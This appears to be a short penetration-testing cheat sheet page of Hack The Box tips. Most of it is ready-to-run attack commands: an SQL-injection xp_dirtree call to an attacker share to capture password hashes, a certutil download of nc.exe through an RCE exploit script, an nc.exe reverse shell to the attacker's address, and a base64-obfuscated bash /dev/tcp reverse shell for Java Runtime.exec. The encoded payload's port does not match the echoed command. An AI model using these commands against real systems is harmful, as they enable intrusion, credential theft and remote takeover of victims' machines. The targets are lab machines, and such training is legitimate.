General Tips

Getting a reverse shell via sql injection to capture password hash - https://0xrick.github.io/hack-the-box/giddy/

EXEC MASTER.sys.xp_dirtree '\10.10.14.209\fakeshare

There are many ways to phrase password - ensure you check spelling

find . -name "*.php" -print0 | xargs -0 grep -i -n "passwd"

Transferring Files to Windows Via Windows Command Execution

On Attacker PC host payload on simple webserver

Next download the file on to the victims PC via RCE using certutil.

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c certutil -urlcache -split -f http://10.10.14.34:8000/nc.exe c:/windows/temp/nc.exe"

Next setup a listener on the attacker PC

Next on the victim PC, launch the newly downloaded nc.exe and connect back to the attacker PC.

python exploit.py -u "admin@htb.local" -p "baconandchesse" -i "http://10.10.10.180" -c powershell.exe -a "/c c:/windows/temp/nc.exe 10.10.14.34 8090 -e cmd.exe"

RCE Payload Workarounds:

java.lang.Runtime.exec:

// RCE COMMAND
johnd@kali:~/HackTheBox$ echo 'bash -i >& /dev/tcp/10.10.14.14/8899 0>&1' | base64 
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODk5IDA+JjEK

// PAYLOAD
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC84ODg4IDA+JjEK=}|{base64,-d}|{bash,-i}

PreviousPowershell NextActive Directory Enumeration Cheetsheet

Last updated 5 years ago

hashtagTransferring Files to Windows Via Windows Command Execution

hashtagRCE Payload Workarounds:

hashtagjava.lang.Runtime.exec:

Transferring Files to Windows Via Windows Command Execution

RCE Payload Workarounds:

java.lang.Runtime.exec: